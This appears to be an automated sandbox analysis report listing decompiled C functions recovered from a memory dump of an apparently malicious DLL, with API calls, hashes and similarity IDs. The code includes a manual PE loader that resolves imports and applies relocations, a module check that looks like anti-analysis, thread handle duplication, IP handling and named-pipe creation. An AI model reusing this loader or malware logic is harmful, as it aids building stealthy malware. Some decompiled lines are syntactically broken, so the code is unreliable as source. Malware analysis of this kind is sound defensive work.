    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: memcpy
    • String ID:
    • API String ID: 3510742995-0
    • Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
    • Instruction ID: 73544d1bf8d56d5a7bbbe12107b863a73eec727039acdfdce1cff8ad1696c42c
    • Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
    • Instruction Fuzzy Hash: 12D124B56006049FCB28CF69D8D4A6AB7F1FF88344B25892DE88ACB701D771F995CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E10004D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
    				char _v516;
    				char _v556;
    				char _v564;
    				char _v568;
    				char _v572;
    				char _v576;
    				intOrPtr _v580;
    				char _v588;
    				signed int _v596;
    				intOrPtr _v602;
    				intOrPtr _v604;
    				char _v608;
    				CHAR* _v612;
    				CHAR* _v616;
    				signed int _v620;
    				signed int _v624;
    				signed int _v628;
    				signed int _v632;
    				char _v636;
    				intOrPtr _t117;
    				signed int _t120;
    				CHAR* _t122;
    				intOrPtr _t123;
    				CHAR* _t125;
    				WCHAR* _t128;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				WCHAR* _t136;
    				intOrPtr _t140;
    				WCHAR* _t141;
    				CHAR* _t142;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t151;
    				WCHAR* _t152;
    				signed int _t157;
    				WCHAR* _t158;
    				intOrPtr _t161;
    				intOrPtr _t163;
    				intOrPtr _t164;
    				intOrPtr _t168;
    				signed int _t171;
    				signed int _t176;
    				WCHAR* _t180;
    				char _t181;
    				intOrPtr _t195;
    				intOrPtr _t206;
    				signed int _t210;
    				char _t215;
    				WCHAR* _t226;
    				intOrPtr _t230;
    				intOrPtr _t233;
    				WCHAR* _t234;
    				signed int _t235;
    				signed int _t242;
    				signed int _t244;
    				signed int _t245;
    				CHAR* _t246;
    				intOrPtr _t258;
    				intOrPtr _t266;
    				void* _t267;
    				void* _t269;
    				intOrPtr _t270;
    				void* _t276;
    				intOrPtr _t278;
    				void* _t295;
    				void* _t296;
    				intOrPtr _t302;
    				WCHAR* _t322;
    				CHAR* _t323;
    				void* _t325;
    				WCHAR* _t326;
    				intOrPtr _t328;
    				WCHAR* _t330;
    				signed int _t333;
    				intOrPtr* _t335;
    				void* _t354;
    
    				_t354 = __fp0;
    				_t335 = (_t333 & 0xfffffff8) - 0x26c;
    				_t117 =  *0x1001e688; // 0x87804a0
    				_t242 = 0;
    				_t325 = __ecx;
    				_v620 = 0;
    				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
    					L8:
    					_t13 = E1000B78E(0x1001b9c0,  &_v516) + 1; // 0x1
    					E1000A853( &_v556, _t13, 0);
    					_t295 = 0x64;
    					_t120 = E1000A457( &_v556, _t295);
    					 *0x1001e748 = _t120;
    					if(_t120 != 0) {
    						_push(0x4e5);
    						_t296 = 0x10;
    						 *0x1001e680 = E1000E1C7(0x1001b9c4, _t296);
    						 *_t335 = 0x610;
    						_t122 = E100095C7(0x1001b9c4);
    						_push(_t242);
    						_push(_t122);
    						_v612 = _t122;
    						_t123 =  *0x1001e688; // 0x87804a0
    						_t125 = E100092CB(_t123 + 0x228);
    						_t315 = _t125;
    						_v616 = _t125;
    						E100085BB( &_v612);
    						_t128 = E1000B24F(_t125);
    						__eflags = _t128;
    						if(_t128 != 0) {
    							_t234 = E10008955(_t315, 1, _t242, _t242);
    							__eflags = _t234;
    							if(_t234 != 0) {
    								_t235 = E1000A2C9(_t234);
    							} else {
    								_t235 = _t242;
    							}
    							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
    							 *_t325 = 3;
    						}
    						E10008600( &_v616, 0xfffffffe);
    						_t131 =  *0x1001e688; // 0x87804a0
    						_t21 = _t131 + 0x114; // 0x87805b4
    						E10004A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
    						_t258 =  *0x1001e688; // 0x87804a0
    						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
    						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
    							L19:
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							_v572 = _t325;
    							_v576 =  *((intOrPtr*)(_t258 + 0x214));
    							_t135 =  *0x1001e680; // 0x0
    							_t136 =  *(_t135 + 8);
    							__eflags = _t136;
    							if(_t136 != 0) {
    								 *_t136(_t242, _t242, 1,  &_v568,  &_v564);
    							}
    							_v620 = _t242;
    							E1000E2D1(_t354,  &_v576);
    							_pop(_t258);
    							_t140 =  *0x1001e6b4; // 0x87ffa20
    							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
    							__eflags = _t141;
    							if(_t141 == 0) {
    								E1000E2D1(_t354,  &_v588);
    								_t230 =  *0x1001e6b4; // 0x87ffa20
    								_pop(_t258);
    								 *((intOrPtr*)(_t230 + 0xc))(_v632);
    							}
    							__eflags =  *0x1001e73c;
    							if( *0x1001e73c <= 0) {
    								goto L37;
    							} else {
    								_t163 =  *0x1001e680; // 0x0
    								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
    								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
    									_t226 =  *(_t163 + 0xc);
    									__eflags = _t226;
    									if(_t226 != 0) {
    										 *_t226(_v580);
    									}
    								}
    								_t164 =  *0x1001e688; // 0x87804a0
    								_t258 =  *((intOrPtr*)(_t164 + 0x214));
    								__eflags = _t258 - 3;
    								if(_t258 == 3) {
    									goto L37;
    								} else {
    									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
    									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
    										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
    										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
    											goto L37;
    										}
    										E100049A6();
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										_t168 =  *0x1001e684; // 0x87ff878
    										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
    										_t266 = _v602;
    										_t244 = 0x3c;
    										_t171 = _t266 + 0x00000002 & 0x0000ffff;
    										_v596 = _t171;
    										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
    										_t176 = _t266 + 0x0000000e & 0x0000ffff;
    										_v624 = _t176;
    										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
    										_t180 = E100085EA(0x1000);
    										_v632 = _t180;
    										_pop(_t267);
    										__eflags = _t180;
    										if(_t180 != 0) {
    											_t181 = E1000109A(_t267, 0x148);
    											_t302 =  *0x1001e688; // 0x87804a0
    											_v636 = _t181;
    											_push(_t302 + 0x648);
    											_push(0xa);
    											_push(7);
    											_t269 = 2;
    											E10009013(_t269,  &_v572);
    											_t270 =  *0x1001e688; // 0x87804a0
    											_t330 = E100060C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
    											_v616 = _t330;
    											__eflags = _t330;
    											if(_t330 != 0) {
    												_push(_v624 % _t244 & 0x0000ffff);
    												_push(_v628 & 0x0000ffff);
    												_push(_v596 % _t244 & 0x0000ffff);
    												_push(_v620 & 0x0000ffff);
    												_push(_t330);
    												_push( &_v572);
    												_t195 =  *0x1001e688; // 0x87804a0
    												__eflags = _t195 + 0x1020;
    												E10009626(_v632, 0x1000, _v636, _t195 + 0x1020);
    												E100085BB( &_v636);
    												E1000A8F7(_v632, 0, 0xbb8, 1);
    												E10008600( &_v616, 0xfffffffe);
    											}
    											E10008600( &_v632, 0xfffffffe);
    										}
    										goto L42;
    									}
    									__eflags = _t258 - 2;
    									if(_t258 != 2) {
    										goto L37;
    									}
    									E100049A6();
    									asm("stosd");
    									asm("stosd");
    									asm("stosd");
    									asm("stosd");
    									_t206 =  *0x1001e684; // 0x87ff878
    									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
    									_t210 = _v602 + 0x00000002 & 0x0000ffff;
    									_v628 = _t210;
    									_t245 = 0x3c;
    									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
    									_t322 = E100085EA(0x1000);
    									_v624 = _t322;
    									_pop(_t276);
    									__eflags = _t322;
    									if(_t322 != 0) {
    										_t215 = E100095C7(_t276, 0x32d);
    										_t278 =  *0x1001e688; // 0x87804a0
    										_push(_t278 + 0x228);
    										_push(_v628 % _t245 & 0x0000ffff);
    										_v636 = _t215;
    										E10009626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
    										E100085BB( &_v636);
    										E1000A8F7(_t322, 0, 0xbb8, 1);
    										E10008600( &_v624, 0xfffffffe);
    									}
    									goto L42;
    								}
    							}
    						} else {
    							_t233 =  *((intOrPtr*)(_t258 + 0x214));
    							__eflags = _t233 - 3;
    							if(_t233 == 3) {
    								goto L19;
    							}
    							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
    							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
    								L37:
    								_t142 = E100095C7(_t258, 0x610);
    								_push(_t242);
    								_push(_t142);
    								_v616 = _t142;
    								_t143 =  *0x1001e688; // 0x87804a0
    								_t326 = E100092CB(_t143 + 0x228);
    								_v612 = _t326;
    								__eflags = _t326;
    								if(_t326 != 0) {
    									_t158 = E1000B24F(_t326);
    									__eflags = _t158;
    									if(_t158 != 0) {
    										_t161 =  *0x1001e684; // 0x87ff878
    										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
    									}
    									E10008600( &_v612, 0xfffffffe);
    								}
    								E100085BB( &_v616);
    								_t148 =  *0x1001e688; // 0x87804a0
    								lstrcpynW(_t148 + 0x438,  *0x1001e740, 0x20a);
    								_t151 =  *0x1001e688; // 0x87804a0
    								_t152 = _t151 + 0x228;
    								__eflags = _t152;
    								lstrcpynW(_t152,  *0x1001e738, 0x20a);
    								_t328 =  *0x1001e688; // 0x87804a0
    								_t115 = _t328 + 0x228; // 0x87806c8
    								 *((intOrPtr*)(_t328 + 0x434)) = E10008FA4(_t115, __eflags);
    								E10008600(0x1001e740, 0xfffffffe);
    								E10008600(0x1001e738, 0xfffffffe);
    								L42:
    								_t157 = 0;
    								__eflags = 0;
    								L43:
    								return _t157;
    							}
    							__eflags = _t233 - 2;
    							if(_t233 != 2) {
    								goto L37;
    							}
    							goto L19;
    						}
    					}
    					L9:
    					_t157 = _t120 | 0xffffffff;
    					goto L43;
    				}
    				_t246 = E100095AD(0x6e2);
    				_v616 = _t246;
    				_t323 = E100095AD(0x9f5);
    				_v612 = _t323;
    				if(_t246 == 0 || _t323 == 0) {
    					L7:
    					_t242 = 0;
    					goto L8;
    				} else {
    					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
    						_v620 = 1;
    					}
    					E100085A8( &_v616);
    					_t120 = E100085A8( &_v612);
    					if(_v620 != 0) {
    						goto L9;
    					}
    					goto L7;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC2
    • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC9
    • lstrcpynW.KERNEL32(08780068,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 10005257
    • lstrcpynW.KERNEL32(08780278,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 1000526B
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: HandleModulelstrcpyn
    • String ID:
    • API String ID: 3430401031-0
    • Opcode ID: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
    • Instruction ID: af7c25fddbaaac8c810623370fa574110a5ffa4de8c8a0639458766f2d690bf0
    • Opcode Fuzzy Hash: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
    • Instruction Fuzzy Hash: 02E1DBB1508341AFF300CF68CC85EABB3E9EB98394F414A2AF584C7295DB71ED448B52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E10012AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				signed int _v5;
    				signed short _v12;
    				intOrPtr* _v16;
    				signed int* _v20;
    				intOrPtr _v24;
    				unsigned int _v28;
    				signed short* _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr* _v40;
    				signed short* _v44;
    				intOrPtr _v48;
    				unsigned int _v52;
    				intOrPtr _v56;
    				_Unknown_base(*)()* _v60;
    				signed int _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				unsigned int _v76;
    				intOrPtr _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				signed int _t149;
    				void* _t189;
    				signed int _t194;
    				signed int _t196;
    				intOrPtr _t236;
    
    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    				_v24 = _v72;
    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
    				_v56 = _t236;
    				if(_t236 == 0) {
    					L13:
    					while(0 != 0) {
    					}
    					_push(8);
    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
    						L35:
    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
    						while(0 != 0) {
    						}
    						if(_a12 != 0) {
    							 *_a12 = _v68;
    						}
    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
    						return _v68(_a4, 1, _a8);
    					}
    					_v84 = 0x80000000;
    					_t149 = 8;
    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						if(_v36 == 0) {
    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						}
    						if(_v36 != 0) {
    							if( *_v16 == 0) {
    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
    							} else {
    								_v20 =  *_v16 + _a4;
    							}
    							_v64 = _v64 & 0x00000000;
    							while( *_v20 != 0) {
    								if(( *_v20 & _v84) == 0) {
    									_v88 =  *_v20 + _a4;
    									_v60 = GetProcAddress(_v36, _v88 + 2);
    								} else {
    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
    								}
    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
    									 *_v20 = _v60;
    								} else {
    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
    								}
    								_v20 =  &(_v20[1]);
    								_v64 = _v64 + 4;
    							}
    							_v16 = _v16 + 0x14;
    							continue;
    						} else {
    							_t189 = 0xfffffffd;
    							return _t189;
    						}
    					}
    					goto L35;
    				}
    				_t194 = 8;
    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
    				_t196 = 8;
    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
    				while(0 != 0) {
    				}
    				while(_v48 > 0) {
    					_v28 = _v44[2];
    					_v48 = _v48 - _v28;
    					_v28 = _v28 - 8;
    					_v28 = _v28 >> 1;
    					_v32 =  &(_v44[4]);
    					_v80 = _a4 +  *_v44;
    					_v52 = _v28;
    					while(1) {
    						_v76 = _v52;
    						_v52 = _v52 - 1;
    						if(_v76 == 0) {
    							break;
    						}
    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
    						_v12 =  *_v32 & 0xfff;
    						_v40 = (_v12 & 0x0000ffff) + _v80;
    						if((_v5 & 0x000000ff) != 3) {
    							if((_v5 & 0x000000ff) == 0xa) {
    								 *_v40 =  *_v40 + _v56;
    							}
    						} else {
    							 *_v40 =  *_v40 + _v56;
    						}
    						_v32 =  &(_v32[1]);
    					}
    					_v44 = _v32;
    				}
    				goto L13;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 10012C57
    • LoadLibraryA.KERNEL32(?), ref: 10012C70
    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CCC
    • GetProcAddress.KERNEL32(00000000,?), ref: 10012CEB
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressProc$HandleLibraryLoadModule
    • String ID:
    • API String ID: 384173800-0
    • Opcode ID: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
    • Instruction ID: 40dbc58933749a0a0cd74d6661849015ce43e91b4c911e91057927375977fa56
    • Opcode Fuzzy Hash: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
    • Instruction Fuzzy Hash: F5A179B5A00219DFCB54CFA8C881AADBBF1FF08354F108569E915AB361D734EA91CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				char _v28;
    				void* _t13;
    				intOrPtr _t15;
    				signed int _t16;
    				intOrPtr _t17;
    				signed int _t18;
    				char _t20;
    				intOrPtr _t22;
    				void* _t23;
    				void* _t24;
    				intOrPtr _t29;
    				intOrPtr _t35;
    				intOrPtr _t41;
    				intOrPtr _t43;
    				intOrPtr _t48;
    				void* _t51;
    				signed int _t61;
    				signed int _t64;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t61 = __ecx;
    				_t41 =  *0x1001e6dc; // 0x0
    				_t13 = E1000A4A5(_t41, 0);
    				while(_t13 < 0) {
    					E100097F2( &_v28);
    					_t43 =  *0x1001e6e0; // 0x0
    					_t15 =  *0x1001e6e4; // 0x0
    					_t41 = _t43 + 0xe10;
    					asm("adc eax, ebx");
    					__eflags = _t15 - _v24;
    					if(__eflags > 0) {
    						L9:
    						_t16 = 0xfffffffe;
    						L13:
    						return _t16;
    					}
    					if(__eflags < 0) {
    						L4:
    						_t17 =  *0x1001e684; // 0x87ff878
    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
    						__eflags = _t18;
    						if(_t18 == 0) {
    							break;
    						}
    						_t35 =  *0x1001e684; // 0x87ff878
    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
    						_t41 =  *0x1001e6dc; // 0x0
    						__eflags = 0;
    						_t13 = E1000A4A5(_t41, 0);
    						continue;
    					}
    					__eflags = _t41 - _v28;
    					if(_t41 >= _v28) {
    						goto L9;
    					}
    					goto L4;
    				}
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t20 =  *0x1001e6e8; // 0x0
    				_v28 = _t20;
    				_t22 = E1000A68F(_t41, _t61,  &_v16);
    				_v20 = _t22;
    				if(_t22 != 0) {
    					_t23 = GetCurrentProcess();
    					_t24 = GetCurrentThread();
    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
    					E100097F2(0x1001e6e0);
    					_t64 = E10001A1B( &_v28, E10001226, _t71);
    					__eflags = _t64;
    					if(_t64 >= 0) {
    						_push(0);
    						_push( *0x1001e760);
    						_t51 = 0x27;
    						E10009EEC(_t51);
    					}
    				} else {
    					_t64 = _t61 | 0xffffffff;
    				}
    				_t29 =  *0x1001e684; // 0x87ff878
    				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
    				_t48 =  *0x1001e6dc; // 0x0
    				 *0x1001e6d0 = 0;
    				E1000A4C1(_t48);
    				E10008600( &_v24, 0);
    				_t16 = _t64;
    				goto L13;
    			}

    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
    • Instruction ID: d906aae5790399c38ac9c36321e5d7763f5971439be1128eebad97b72ddd2630
    • Opcode Fuzzy Hash: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
    • Instruction Fuzzy Hash: E131B4366082A4AFF344DFA4DCC5C6E77A9FB983E0B904A2AF541D71A5DE30ED048752
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E10001B2D(void* __eflags, void* __fp0) {
    				char _v24;
    				char _v28;
    				void* _t12;
    				intOrPtr _t14;
    				void* _t15;
    				intOrPtr _t16;
    				void* _t17;
    				void* _t19;
    				void* _t20;
    				char _t24;
    				intOrPtr _t26;
    				intOrPtr _t28;
    				intOrPtr _t33;
    				intOrPtr _t38;
    				intOrPtr _t40;
    				void* _t41;
    				intOrPtr _t46;
    				void* _t48;
    				intOrPtr _t51;
    				void* _t61;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t38 =  *0x1001e6f4; // 0x0
    				_t12 = E1000A4A5(_t38, 0);
    				while(_t12 < 0) {
    					E100097F2( &_v28);
    					_t40 =  *0x1001e700; // 0x0
    					_t14 =  *0x1001e704; // 0x0
    					_t41 = _t40 + 0x3840;
    					asm("adc eax, ebx");
    					__eflags = _t14 - _v24;
    					if(__eflags > 0) {
    						L13:
    						_t15 = 0;
    					} else {
    						if(__eflags < 0) {
    							L4:
    							_t16 =  *0x1001e684; // 0x87ff878
    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
    							__eflags = _t17;
    							if(_t17 == 0) {
    								break;
    							} else {
    								_t33 =  *0x1001e684; // 0x87ff878
    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
    								_t51 =  *0x1001e6f4; // 0x0
    								__eflags = 0;
    								_t12 = E1000A4A5(_t51, 0);
    								continue;
    							}
    						} else {
    							__eflags = _t41 - _v28;
    							if(_t41 >= _v28) {
    								goto L13;
    							} else {
    								goto L4;
    							}
    						}
    					}
    					L12:
    					return _t15;
    				}
    				E100097F2(0x1001e700);
    				_t19 = GetCurrentProcess();
    				_t20 = GetCurrentThread();
    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t24 =  *0x1001e6e8; // 0x0
    				_v28 = _t24;
    				_t61 = E10001A1B( &_v28, E1000131E, _t71);
    				if(_t61 >= 0) {
    					_push(0);
    					_push( *0x1001e760);
    					_t48 = 0x27;
    					E10009EEC(_t48);
    				}
    				if(_v24 != 0) {
    					E10006876( &_v24);
    				}
    				_t26 =  *0x1001e684; // 0x87ff878
    				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
    				_t28 =  *0x1001e758; // 0x0
    				 *0x1001e6ec = 0;
    				_t29 =  !=  ? 1 : _t28;
    				_t46 =  *0x1001e6f4; // 0x0
    				 *0x1001e758 =  !=  ? 1 : _t28;
    				E1000A4C1(_t46);
    				_t15 = _t61;
    				goto L12;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
    • GetCurrentThread.KERNEL32 ref: 10001BCF
    • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
    • DuplicateHandle.KERNEL32(00000000), ref: 10001BD9
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Current$Process$DuplicateHandleThread
    • String ID:
    • API String ID: 3566409357-0
    • Opcode ID: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
    • Instruction ID: d1363189eadf394b0d6d3c5faf128b237252a217eef9a43260953257b15cddd2
    • Opcode Fuzzy Hash: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
    • Instruction Fuzzy Hash: 9C31AD796083A19FF704DF64CCD8D6E77A9EB983D0B408928F601872A6DB30EC44CB52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E10001A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				CHAR* _v20;
    				char _v36;
    				signed short _t22;
    				CHAR* _t23;
    				CHAR* _t24;
    				CHAR* _t32;
    				intOrPtr _t37;
    				CHAR* _t38;
    				CHAR* _t39;
    				intOrPtr _t40;
    				intOrPtr _t54;
    				char* _t57;
    				signed int _t60;
    				signed int _t61;
    				signed int _t64;
    				CHAR* _t66;
    				void* _t74;
    
    				_t74 = __fp0;
    				_t40 = __ecx;
    				_t37 = __edx;
    				_v12 = __ecx;
    				_t57 =  *0x1001e6f0; // 0x0
    				_push(_t60);
    				_t61 = _t60 | 0xffffffff;
    				_v16 = __edx;
    				_t66 = _t61;
    				if( *_t57 != 0) {
    					L6:
    					_t22 =  *0x1001e6fc; // 0x0
    					_t72 = _t22;
    					if(_t22 == 0) {
    						goto L9;
    					} else {
    						_t24 = E1000160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
    						_t66 = _t24;
    						if(_t66 < 0) {
    							goto L9;
    						} else {
    						}
    					}
    				} else {
    					_push(0x2d);
    					_t39 = E10009E8B();
    					_v20 = _t39;
    					_t32 = E10009E4C(0x2e);
    					_v8 = _t32;
    					if(_t39 != 0 && _t32 != _t61) {
    						_t54 =  *0x1001e6f0; // 0x0
    						E100096B0(_t54, _t39, 0x100);
    						 *0x1001e6fc = _v8;
    					}
    					E10008600( &_v20, _t61);
    					_t57 =  *0x1001e6f0; // 0x0
    					if( *_t57 == 0) {
    						L9:
    						_t38 = 0;
    						_v8 = 0;
    						_t23 = E10001778( &_v8, _t74);
    						_v20 = _t23;
    						__eflags = _t23;
    						if(_t23 != 0) {
    							__eflags = _v8;
    							if(_v8 > 0) {
    								_t13 =  &(_t23[4]); // 0x4
    								_t64 = _t13;
    								while(1) {
    									__eflags =  *_t64;
    									if(__eflags != 0) {
    										__imp__#12(0x10);
    										lstrcpynA( &_v36, _t23,  *_t64);
    										_t23 = E1000160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
    										_t66 = _t23;
    									}
    									__eflags = _t66;
    									if(_t66 >= 0) {
    										break;
    									}
    									_t38 = _t38 + 1;
    									_t64 = _t64 + 0x20;
    									__eflags = _t38 - _v8;
    									if(_t38 < _v8) {
    										continue;
    									}
    									break;
    								}
    								_t61 = _t64 | 0xffffffff;
    								__eflags = _t61;
    							}
    							E10008600( &_v20, _v8);
    						}
    						__eflags = _t66;
    						_t62 =  >=  ? _t66 : _t61;
    						_t24 =  >=  ? _t66 : _t61;
    					} else {
    						_t37 = _v16;
    						_t40 = _v12;
    						goto L6;
    					}
    				}
    				return _t24;
    			}

    APIs
    • inet_ntoa.WS2_32(00000004), ref: 10001ADB
    • lstrcpynA.KERNEL32(?,00000000), ref: 10001AE6
      • Part of subcall function 100096B0: memset.MSVCRT ref: 100096D9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: inet_ntoalstrcpynmemset
    • String ID: @}s
    • API String ID: 129148211-1738643329
    • Opcode ID: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
    • Instruction ID: bc20ad2b03a49fadc3bce8d2214928905f70a7fbf5e9e1e62064ea73bd786d80
    • Opcode Fuzzy Hash: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
    • Instruction Fuzzy Hash: CA31C936E04366ABFB01CFE4D881ADE77F5EB48390F21465AE510A72D5EB319E40CB94
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    C-Code - Quality: 83%
    			E036031C2(void* __eflags) {
    				CHAR* _v8;
    				void* _v20;
    				signed int _t10;
    				intOrPtr _t11;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t22;
    				intOrPtr _t28;
    				void* _t33;
    				CHAR* _t42;
    
    				_t28 =  *0x361e688; // 0x33f0000
    				_t10 = E0360C29D( *((intOrPtr*)(_t28 + 0xac)), __eflags);
    				_t42 = _t10;
    				_v8 = _t42;
    				if(_t42 != 0) {
    					_t11 = E036085EA(0x80000); // executed
    					 *0x361e724 = _t11;
    					__eflags = _t11;
    					if(_t11 != 0) {
    						__eflags = E0360BE81( &_v20);
    						_t33 =  <  ? 0 : _v20;
    						__eflags = 0 - _t33;
    						_v20 = _t33;
    						asm("sbb eax, eax");
    						_t16 = CreateNamedPipeA(_t42, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
    						 *0x361e674 = _t16;
    						__eflags = _t16 - 0xffffffff;
    						if(_t16 != 0xffffffff) {
    							E0360BC60( &_v20, 0); // executed
    							_t18 = E036098D4(E03603296, 0, __eflags, 0, 0); // executed
    							__eflags = _t18;
    							if(_t18 != 0) {
    								L9:
    								E03608600( &_v8, 0xffffffff);
    								return 0;
    							}
    							_t22 =  *0x361e684; // 0x530f6c8
    							 *((intOrPtr*)(_t22 + 0x30))( *0x361e674);
    							_push(0xfffffffd);
    							L8:
    							_pop(0);
    							goto L9;
    						}
    						 *0x361e674 = 0;
